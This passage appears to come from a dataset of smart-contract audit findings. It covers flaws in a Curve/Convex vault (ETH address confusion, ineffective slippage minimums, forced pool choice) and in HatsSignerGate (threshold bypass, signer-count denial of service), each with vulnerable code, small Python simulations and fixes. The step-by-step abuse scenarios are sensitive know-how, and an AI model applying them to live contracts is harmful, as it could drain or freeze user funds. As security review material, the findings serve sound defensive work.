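# Only deposits within ~1% of the 60% pool share pass
assert check_price_limit(6 * 10**17, 595 * 10**15, LIMIT)
```

Tightening the oracle band to harden price checks therefore simultaneously narrows the set of deposit ratios that `reinvestReward` will accept.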
Logic Error due to different representation of Native ETH (0x0 & 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE)
medium
Unexpected results might occur during vault initialization if either of the pool's tokens is a Native ETH due to the confusion between `Deployments.ETH_ADDRESS (address(0))` and `Deployments.ALT_ETH_ADDRESS (0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE)`.\\nThe `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is explicitly converted to `Deployments.ETH_ADDRESS (address(0)` during deployment.\\n```\\nFile: Curve2TokenPoolMixin.sol\\nabstract contract Curve2TokenPoolMixin is CurvePoolMixin {\\n..SNIP..\\n constructor(\\n NotionalProxy notional_,\\n ConvexVaultDeploymentParams memory params\\n ) CurvePoolMixin(notional_, params) {\\n address primaryToken = _getNotionalUnderlyingToken(params.baseParams.primaryBorrowCurrencyId);\\n\\n PRIMARY_TOKEN = primaryToken;\\n\\n // Curve uses ALT_ETH_ADDRESS\\n if (primaryToken == Deployments.ETH_ADDRESS) {\\n primaryToken = Deployments.ALT_ETH_ADDRESS;\\n }\\n\\n address token0 = CURVE_POOL.coins(0);\\n address token1 = CURVE_POOL.coins(1);\\n \\n uint8 primaryIndex;\\n address secondaryToken;\\n if (token0 == primaryToken) {\\n primaryIndex = 0;\\n secondaryToken = token1;\\n } else {\\n primaryIndex = 1;\\n secondaryToken = token0;\\n }\\n\\n if (secondaryToken == Deployments.ALT_ETH_ADDRESS) {\\n secondaryToken = Deployments.ETH_ADDRESS;\\n }\\n\\n PRIMARY_INDEX = primaryIndex;\\n SECONDARY_TOKEN = secondaryToken;\\n```\\n\\nIt was observed that there is a logic error within the `Curve2TokenConvexVault.initialize` function. Based on Lines 56 and 59 within the `Curve2TokenConvexVault.initialize` function, it assumes that if either the primary or secondary token is ETH, then the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` will be set to `Deployments.ALT_ETH_ADDRESS`, which point to `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE`.\\nHowever, this is incorrect as the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` has already been converted to `Deployments.ETH_ADDRESS (address(0))` during deployment. 
Refer to the constructor of `Curve2TokenPoolMixin`.\\nThus, the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` will never be equal to `Deployments.ALT_ETH_ADDRESS`, and the condition at Lines 56 and 59 will always evaluate to True.\\n```\\nFile: Curve2TokenConvexVault.sol\\ncontract Curve2TokenConvexVault is Curve2TokenVaultMixin {\\n..SNIP..\\n function initialize(InitParams calldata params)\\n external\\n initializer\\n onlyNotionalOwner\\n {\\n __INIT_VAULT(params.name, params.borrowCurrencyId);\\n CurveVaultStorage.setStrategyVaultSettings(params.settings);\\n\\n if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n IERC20(PRIMARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n IERC20(SECONDARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n\\n CURVE_POOL_TOKEN.checkApprove(address(CONVEX_BOOSTER), type(uint256).max);\\n }\\n```\\n\\nAs a result, if the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is `Deployments.ETH_ADDRESS (address(0))`, the code will go ahead to call the `checkApprove` function, which might cause unexpected results during vault initialization.
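The always-true guard can be demonstrated with a short Python sketch (address constants per `Deployments`):

```python
ETH_ADDRESS = "0x0000000000000000000000000000000000000000"      # Deployments.ETH_ADDRESS
ALT_ETH_ADDRESS = "0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE"  # Deployments.ALT_ETH_ADDRESS

# The constructor normalizes ALT_ETH_ADDRESS back to ETH_ADDRESS before storing
primary_token = ETH_ADDRESS

# Guard as written in initialize(): always True for native ETH,
# so checkApprove(address(0)) is attempted
buggy_guard = primary_token != ALT_ETH_ADDRESS

# Checking both representations correctly skips the approval for native ETH
fixed_guard = primary_token not in (ALT_ETH_ADDRESS, ETH_ADDRESS)

assert buggy_guard is True
assert fixed_guard is False
```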
If the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is equal to `Deployments.ALT_ETH_ADDRESS` or `Deployments.ETH_ADDRESS`, this means that it points to native ETH and the `checkApprove` can be safely skipped.\\n```\\nfunction initialize(InitParams calldata params)\\n external\\n initializer\\n onlyNotionalOwner\\n{\\n __INIT_VAULT(params.name, params.borrowCurrencyId);\\n CurveVaultStorage.setStrategyVaultSettings(params.settings);\\n\\n// Remove the line below\\n if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n// Add the line below\\n if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS && PRIMARY_TOKEN != Deployments.ETH_ADDRESS) {\\n IERC20(PRIMARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n// Remove the line below\\n if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n// Add the line below\\n if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS && SECONDARY_TOKEN != Deployments.ETH_ADDRESS) {\\n IERC20(SECONDARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n\\n CURVE_POOL_TOKEN.checkApprove(address(CONVEX_BOOSTER), type(uint256).max);\\n}\\n```\\n
Unexpected results during vault initialization if either of the pool's tokens is a Native ETH.
```\\nFile: Curve2TokenPoolMixin.sol\\nabstract contract Curve2TokenPoolMixin is CurvePoolMixin {\\n..SNIP..\\n constructor(\\n NotionalProxy notional_,\\n ConvexVaultDeploymentParams memory params\\n ) CurvePoolMixin(notional_, params) {\\n address primaryToken = _getNotionalUnderlyingToken(params.baseParams.primaryBorrowCurrencyId);\\n\\n PRIMARY_TOKEN = primaryToken;\\n\\n // Curve uses ALT_ETH_ADDRESS\\n if (primaryToken == Deployments.ETH_ADDRESS) {\\n primaryToken = Deployments.ALT_ETH_ADDRESS;\\n }\\n\\n address token0 = CURVE_POOL.coins(0);\\n address token1 = CURVE_POOL.coins(1);\\n \\n uint8 primaryIndex;\\n address secondaryToken;\\n if (token0 == primaryToken) {\\n primaryIndex = 0;\\n secondaryToken = token1;\\n } else {\\n primaryIndex = 1;\\n secondaryToken = token0;\\n }\\n\\n if (secondaryToken == Deployments.ALT_ETH_ADDRESS) {\\n secondaryToken = Deployments.ETH_ADDRESS;\\n }\\n\\n PRIMARY_INDEX = primaryIndex;\\n SECONDARY_TOKEN = secondaryToken;\\n```\\n
Ineffective slippage mechanism when redeeming proportionally
high
A trade will continue to be executed regardless of how bad the slippage is since the minimum amount returned by the `TwoTokenPoolUtils._getMinExitAmounts` function does not work effectively. Thus, a trade might incur significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.\\nThe `params.minPrimary` and `params.minSecondary` are calculated automatically based on the share of the Curve pool with a small discount within the `Curve2TokenConvexHelper._executeSettlement` function (Refer to Line 124 below)\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice calculates the expected primary and secondary amounts based on\\n /// the given spot price and oracle price\\n function _getMinExitAmounts(\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext calldata strategyContext,\\n uint256 spotPrice,\\n uint256 oraclePrice,\\n uint256 poolClaim\\n ) internal view returns (uint256 minPrimary, uint256 minSecondary) {\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n\\n // min amounts are calculated based on the share of the Balancer pool with a small discount applied\\n uint256 totalPoolSupply = poolContext.poolToken.totalSupply();\\n 
minPrimary = (poolContext.primaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / // @audit-info poolSlippageLimitPercent = 9975, # 0.25%\\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS)); // @audit-info VAULT_PERCENT_BASIS = 1e4 = 10000\\n minSecondary = (poolContext.secondaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n }\\n```\\n\\nWhen LP tokens are redeemed proportionally via the Curve Pool's `remove_liquidity` function, the tokens received are based on the share of the Curve pool as the source code.\\n```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity(\\n _amount: uint256,\\n _min_amounts: uint256[N_COINS],\\n) -> uint256[N_COINS]:\\n """\\n @notice Withdraw coins from the pool\\n @dev Withdrawal amounts are based on current deposit ratios\\n @param _amount Quantity of LP tokens to burn in the withdrawal\\n @param _min_amounts Minimum amounts of underlying coins to receive\\n @return List of amounts of coins that were withdrawn\\n """\\n amounts: uint256[N_COINS] = self._balances()\\n lp_token: address = self.lp_token\\n total_supply: uint256 = ERC20(lp_token).totalSupply()\\n CurveToken(lp_token).burnFrom(msg.sender, _amount) # dev: insufficient funds\\n\\n for i in range(N_COINS):\\n value: uint256 = amounts[i] * _amount / total_supply\\n assert value >= _min_amounts[i], "Withdrawal resulted in fewer coins than expected"\\n\\n amounts[i] = value\\n if i == 0:\\n raw_call(msg.sender, b"", value=value)\\n else:\\n assert ERC20(self.coins[1]).transfer(msg.sender, value)\\n\\n log RemoveLiquidity(msg.sender, amounts, empty(uint256[N_COINS]), total_supply - _amount)\\n\\n return amounts\\n```\\n\\nAssume a Curve Pool with the following state:\\nConsists of 200 US Dollars worth of tokens (100 DAI and 100 USDC). 
DAI is the primary token\\nDAI <> USDC price is 1:1\\nTotal Supply = 100 LP Pool Tokens\\nAssume that 50 LP Pool Tokens will be claimed during vault settlement.\\n`TwoTokenPoolUtils._getMinExitAmounts` function will return `49.875 DAI` as `params.minPrimary` and `49.875 USDC` as `params.minSecondary` based on the following calculation\\n```\\nminPrimary = (poolContext.primaryBalance * poolClaim * strategyContext.vaultSettings.poolSlippageLimitPercent / (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS)\\nminPrimary = (100 DAI * 50 LP_TOKEN * 99.75% / (100 LP_TOKEN * 100%)\\n\\nRewrite for clarity (ignoring rounding error):\\nminPrimary = 100 DAI * (50 LP_TOKEN/100 LP_TOKEN) * (99.75%/100%) = 49.875 DAI\\n\\nminSecondary = same calculation = 49.875 USDC\\n```\\n\\nCurve Pool's `remove_liquidity` function will return `50 DAI` and `50 USDC` if 50 LP Pool Tokens are redeemed.\\nNote that `TwoTokenPoolUtils._getMinExitAmounts` function performs the calculation based on the spot balance of the pool similar to the approach of the Curve Pool's `remove_liquidity` function. However, the `TwoTokenPoolUtils._getMinExitAmounts` function applied a discount to the returned result, while the Curve Pool's `remove_liquidity` function did not.\\nAs such, the number of tokens returned by Curve Pool's `remove_liquidity` function will always be larger than the number of tokens returned by the `TwoTokenPoolUtils._getMinExitAmounts` function regardless of the on-chain economic condition or the pool state (e.g. imbalance). Thus, the minimum amounts (minAmounts) pass into the Curve Pool's `remove_liquidity` function will never be triggered under any circumstance.\\n```\\na = Curve Pool's remove_liquidity => x DAI\\nb = TwoTokenPoolUtils._getMinExitAmounts => (x DAI - 0.25% discount)\\na > b => true (for all instances)\\n```\\n\\nThus, the `TwoTokenPoolUtils._getMinExitAmounts` function is not effective in determining the slippage when redeeming proportionally.
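To make the arithmetic above concrete, here is a minimal pure-integer Python sketch of the two formulas (the balances and LP amounts are the assumed example values, not real pool state). It shows the discounted min-exit amount is always strictly below what `remove_liquidity` pays out:

```python
POOL_SLIPPAGE_LIMIT_PERCENT = 9975   # 99.75% of the pro-rata share (0.25% discount)
VAULT_PERCENT_BASIS = 10_000

def get_min_exit_amount(token_balance: int, pool_claim: int, total_supply: int) -> int:
    """Mirrors TwoTokenPoolUtils._getMinExitAmounts for a single token."""
    return (token_balance * pool_claim * POOL_SLIPPAGE_LIMIT_PERCENT) // (
        total_supply * VAULT_PERCENT_BASIS
    )

def remove_liquidity_payout(token_balance: int, pool_claim: int, total_supply: int) -> int:
    """Mirrors Curve's remove_liquidity: exact pro-rata share, no discount."""
    return token_balance * pool_claim // total_supply

# example state: 100 DAI in the pool, 100 LP total supply, settle 50 LP
bal, claim, supply = 100 * 10**18, 50 * 10**18, 100 * 10**18
min_primary = get_min_exit_amount(bal, claim, supply)
payout = remove_liquidity_payout(bal, claim, supply)
print(min_primary / 1e18)    # 49.875
print(payout / 1e18)         # 50.0
assert payout > min_primary  # the minimum can never trigger, whatever the state
```

Because the discount is applied to the exact same pro-rata formula the pool itself uses, the inequality holds for any pool balances, so the minimum amounts provide no real slippage protection.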
When redeeming proportionally, the `TwoTokenPoolUtils._getMinExitAmounts` function can be removed. Instead, give the caller the flexibility to define the slippage/minimum amounts (params.minPrimary and params.minSecondary). To prevent the caller from setting a slippage that is too large, consider restricting the slippage to an acceptable range.\\nThe proper way of computing the minimum amount of tokens to receive from a proportional trade (remove_liquidity) is to call the Curve pool's `calc_token_amount` function off-chain and reduce the returned values by the allowed slippage amount.\\nNote that `calc_token_amount` cannot be used solely on-chain for computing the minimum amount because it uses spot balances for computation, so the result can be manipulated.\\nSidenote: Removing the `TwoTokenPoolUtils._getMinExitAmounts` function also removes the built-in spot price and oracle price validation. Thus, the caller must remember to define the slippage. Otherwise, the vault settlement will risk being sandwiched. Alternatively, shift the `strategyContext._checkPriceLimit(oraclePrice, spotPrice)` code outside the `TwoTokenPoolUtils._getMinExitAmounts` function.
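A minimal sketch of the recommended approach, assuming the expected amounts have already been quoted off-chain (the helper name and the 0.5% tolerance are illustrative, not part of the codebase):

```python
def min_amount_with_slippage(expected_amount: int, slippage_bps: int = 50) -> int:
    """Apply a caller-chosen tolerance (in basis points) to an off-chain quote."""
    return expected_amount * (10_000 - slippage_bps) // 10_000

# e.g. an off-chain quote of 50 DAI for the proportional exit
print(min_amount_with_slippage(50 * 10**18) / 1e18)  # 49.75
```

The key difference from the current design is that the tolerance is anchored to an off-chain quote taken before the transaction, not to the (manipulable) on-chain spot balances at execution time.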
A trade will always be executed even if it returns fewer assets than expected, since the minimum amounts returned by the `TwoTokenPoolUtils._getMinExitAmounts` function can never be triggered. Thus, a trade might incur unexpected slippage, resulting in the vault receiving fewer tokens in return and leading to losses for the vault shareholders.
```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n
Users are forced to use the first pool returned by the Curve Registry
medium
If multiple pools support the exchange, users are forced to use the first pool returned by the Curve Registry. The first pool returned by Curve Registry might not be the most optimal pool to trade with. The first pool might have lesser liquidity, larger slippage, and higher fee than the other pools, resulting in the trade returning lesser assets than expected.\\nWhen performing a trade via the `CurveAdapter._exactInSingle` function, it will call the `CURVE_REGISTRY.find_pool_for_coins` function to find the available pools for exchanging two coins.\\n```\\nFile: CurveAdapter.sol\\n function _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n {\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n\\n if (address(pool) == address(0)) revert InvalidTrade();\\n\\n int128 i = -1;\\n int128 j = -1;\\n for (int128 c = 0; c < MAX_TOKENS; c++) {\\n address coin = pool.coins(uint256(int256(c)));\\n if (coin == sellToken) i = c;\\n if (coin == buyToken) j = c;\\n if (i > -1 && j > -1) break;\\n }\\n\\n if (i == -1 || j == -1) revert InvalidTrade();\\n\\n return (\\n address(pool),\\n abi.encodeWithSelector(\\n ICurvePool.exchange.selector,\\n i,\\n j,\\n trade.amount,\\n trade.limit\\n )\\n );\\n }\\n```\\n\\nHowever, it was observed that when multiple pools are available, users can choose the pool to return by defining the `i` parameter of the `find_pool_for_coins` function as shown below.\\n```\\n@view\\n@external\\ndef find_pool_for_coins(_from: address, _to: address, i: uint256 = 0) -> address:\\n """\\n @notice Find an available pool for exchanging two coins\\n @param _from Address of coin to be sent\\n @param _to Address of coin to be received\\n @param i Index value. 
When multiple pools are available\\n this value is used to return the n'th address.\\n @return Pool address\\n """\\n key: uint256 = bitwise_xor(convert(_from, uint256), convert(_to, uint256))\\n return self.markets[key][i]\\n```\\n\\nHowever, the `CurveAdapter._exactInSingle` did not allow users to define the `i` parameter of the `find_pool_for_coins` function. As a result, users are forced to trade against the first pool returned by the Curve Registry.
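A pure-Python model of the registry's `markets[key][i]` lookup (the pool "addresses" are made up) illustrating how exposing the index parameter would let callers pick among candidate pools:

```python
# hypothetical registry state: three pools serve the same coin pair
markets = {
    ("DAI", "USDC"): ["0xPoolA", "0xPoolB", "0xPoolC"],
}

ZERO_ADDRESS = "0x0"

def find_pool_for_coins(sell: str, buy: str, i: int = 0) -> str:
    """Models CURVE_REGISTRY.find_pool_for_coins with its index parameter."""
    pools = markets.get((sell, buy), [])
    return pools[i] if i < len(pools) else ZERO_ADDRESS

# the adapter as written always takes index 0; passing an index would let
# the caller choose a deeper or cheaper pool instead
print(find_pool_for_coins("DAI", "USDC"))     # 0xPoolA
print(find_pool_for_coins("DAI", "USDC", 1))  # 0xPoolB
```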
If multiple pools support the exchange, consider allowing the users to choose which pool they want to trade against.\\n```\\nfunction _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n{\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n// Remove the line below\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n// Add the line below\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken, trade.pool_index)); \\n```\\n
The first pool returned by the Curve Registry might not be the most optimal pool to trade with. It might have less liquidity, higher slippage, and higher fees than the other pools, resulting in the trade returning fewer assets than expected.
```\\nFile: CurveAdapter.sol\\n function _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n {\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n\\n if (address(pool) == address(0)) revert InvalidTrade();\\n\\n int128 i = -1;\\n int128 j = -1;\\n for (int128 c = 0; c < MAX_TOKENS; c++) {\\n address coin = pool.coins(uint256(int256(c)));\\n if (coin == sellToken) i = c;\\n if (coin == buyToken) j = c;\\n if (i > -1 && j > -1) break;\\n }\\n\\n if (i == -1 || j == -1) revert InvalidTrade();\\n\\n return (\\n address(pool),\\n abi.encodeWithSelector(\\n ICurvePool.exchange.selector,\\n i,\\n j,\\n trade.amount,\\n trade.limit\\n )\\n );\\n }\\n```\\n
Signers can bypass checks and change threshold within a transaction
high
The `checkAfterExecution()` function has checks to ensure that the safe's threshold isn't changed by a transaction executed by signers. However, the parameters used by the check can be changed mid-flight so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors. From the docs:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nHowever, the restriction that the signers cannot change the threshold can be violated.\\nTo see how this is possible, let's check how this invariant is upheld. The following check is performed within the function:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nIf we look up `_getCorrectThreshold()`, we see the following:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nAs we can see, this means that the safe's threshold after the transaction must equal the number of valid signers, bounded by `minThreshold` and `targetThreshold`.\\nHowever, this check does not ensure that the value returned by `_getCorrectThreshold()` is the same before and after the transaction. As a result, as long as the number of owners is also changed in the transaction, the condition can be upheld.\\nTo illustrate, let's look at an example:\\nBefore the transaction, there are 8 owners on the vault, all signers.
targetThreshold == 10 and minThreshold == 2, so the safe's threshold is 8 and everything is good.\\nThe transaction calls `removeOwner()`, removing an owner from the safe and adjusting the threshold down to 7.\\nAfter the transaction, there will be 7 owners on the vault, all signers, the safe's threshold will be 7, and the check will pass.\\nThis simple example focuses on using `removeOwner()` once to decrease the threshold. However, it is also possible to use the safe's multicall functionality to call `removeOwner()` multiple times, changing the threshold more dramatically.
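The example above can be simulated with a small Python model of `_getCorrectThreshold` (the `minThreshold`/`targetThreshold` values are taken from the example):

```python
MIN_THRESHOLD, TARGET_THRESHOLD = 2, 10   # values from the example above

def correct_threshold(valid_signer_count: int) -> int:
    """Mirrors _getCorrectThreshold: the signer count clamped to [min, target]."""
    return max(MIN_THRESHOLD, min(TARGET_THRESHOLD, valid_signer_count))

def check_passes(safe_threshold: int, valid_signer_count: int) -> bool:
    """The post-flight comparison performed in checkAfterExecution()."""
    return safe_threshold == correct_threshold(valid_signer_count)

print(check_passes(8, 8))  # True: 8 owners/signers, threshold 8
# tx calls removeOwner(), dropping one signer AND the threshold together:
print(check_passes(7, 7))  # True: the changed threshold slips through
```

Because only the post-transaction pair is compared, any transaction that changes the owner count and threshold in lockstep passes the check.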
Save the safe's current threshold in `checkTransaction()` before the transaction has executed, and compare the value after the transaction to that value from storage.
Signers can change the threshold of the vault, giving themselves increased control over future transactions and breaking an important trust assumption of the protocol.
```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n
HatsSignerGate + MultiHatsSignerGate: more than maxSigners can be claimed, which leads to DOS in reconcileSignerCount
high
The `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions allow users to become signers.\\nIt is important that neither function allows more valid signers than `maxSigners` to exist.\\nThis is because if there are more valid signers than `maxSigners`, any call to `HatsSignerGateBase.reconcileSignerCount` reverts, which means that no transactions can be executed.\\nThe only way to resolve this is for a valid signer to give up his signer hat. No signer will voluntarily give up his signer hat, and it is wrong that a signer must give it up: valid signers that claimed before `maxSigners` was reached should not be affected by someone trying to become a signer and exceeding `maxSigners`. In other words, the situation where one of the signers needs to give up his signer hat should never have occurred in the first place.\\nThink of the following scenario:\\n`maxSigners=10` and there are 10 valid signers\\nThe signers execute a transaction that calls `Safe.addOwnerWithThreshold` such that there are now 11 owners (still there are 10 valid signers)\\nOne of the 10 signers is no longer a wearer of the hat and `reconcileSignerCount` is called. So there are now 9 valid signers and 11 owners\\nThe signer that was no longer a wearer of the hat in the previous step now wears the hat again. However `reconcileSignerCount` is not called. So there are 11 owners and 10 valid signers.
The HSG however still thinks there are 9 valid signers.\\nWhen a new signer now calls `claimSigner`, all checks will pass and he will be swapped for the owner that is not a valid signer:\\n```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n\\nSo there are now 11 owners and 11 valid signers. This means when `reconcileSignerCount` is called, the following lines cause a revert:\\n```\\n function reconcileSignerCount() public {\\n address[] memory owners = safe.getOwners();\\n uint256 validSignerCount = _countValidSigners(owners);\\n\\n // 11 > 10\\n if (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n }\\n```\\n
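A counts-only Python walkthrough of the scenario (the state names are illustrative; `reconcile_reverts` models the `MaxSignersReached` condition):

```python
MAX_SIGNERS = 10

def reconcile_reverts(valid_signer_count: int) -> bool:
    """True when reconcileSignerCount() would revert with MaxSignersReached."""
    return valid_signer_count > MAX_SIGNERS

cached_signer_count = 10   # HSG's signerCount after the last reconcile
valid_signers = 10         # hat wearers among the safe owners (11 owners total)

valid_signers -= 1         # a signer loses the hat...
cached_signer_count = 9    # ...and reconcileSignerCount() runs
valid_signers += 1         # the hat is regained, but no reconcile runs

# claimSigner: `currentSignerCount >= maxSigs` is 9 >= 10 -> check passes,
# and the caller is swapped in for the one non-signer owner
assert cached_signer_count < MAX_SIGNERS
valid_signers += 1         # now 11 valid signers among 11 owners

print(reconcile_reverts(valid_signers))  # True: every future tx reverts
```

The stale cached count is what lets the eleventh signer through; reconciling inside `claimSigner` (as recommended below) would refresh it to 10 and the `>= maxSigs` check would revert instead.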
The `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions should call `reconcileSignerCount` such that they work with the correct amount of signers and the scenario described in this report cannot occur.\\n```\\ndiff --git a/src/HatsSignerGate.sol b/src/HatsSignerGate.sol\\nindex 7a02faa..949d390 100644\\n--- a/src/HatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/HatsSignerGate.sol\\n@@ -34,6 // Add the line below\\n34,8 @@ contract HatsSignerGate is HatsSignerGateBase {\\n /// @notice Function to become an owner on the safe if you are wearing the signers hat\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n function claimSigner() public virtual {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n\\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n\\n```\\ndiff --git a/src/MultiHatsSignerGate.sol b/src/MultiHatsSignerGate.sol\\nindex da74536..57041f6 100644\\n--- a/src/MultiHatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/MultiHatsSignerGate.sol\\n@@ -39,6 // Add the line below\\n39,8 @@ contract MultiHatsSignerGate is HatsSignerGateBase {\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n /// @param _hatId The hat id to claim signer rights for\\n function claimSigner(uint256 _hatId) public {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n \\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n
As mentioned before, we end up in a situation where one of the valid signers has to give up his signer hat in order for the HSG to become operable again.\\nSo one of the valid signers that has rightfully claimed his spot as a signer may lose his privilege to sign transactions.
```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n
Signers can brick safe by adding unlimited additional signers while avoiding checks
high
There are a number of checks in `checkAfterExecution()` to ensure that the signers cannot perform any illegal actions to exert too much control over the safe. However, there is no check to ensure that additional owners are not added to the safe. This could be done in a way that pushes the total over `maxSigners`, which will cause all future transactions to revert.\\nThis means that signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, owners can also be added by a normal `execTransaction` function. In this case, there are very few checks (all of which could easily or accidentally be missed) to stop us from adding too many owners:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nThat means that either in the case that (a) the safe's threshold is already at `targetThreshold` or (b) the owners being added are currently toggled off or have eligibility turned off, this check will pass and the owners will be added.\\nOnce they are added, all future transactions will fail. 
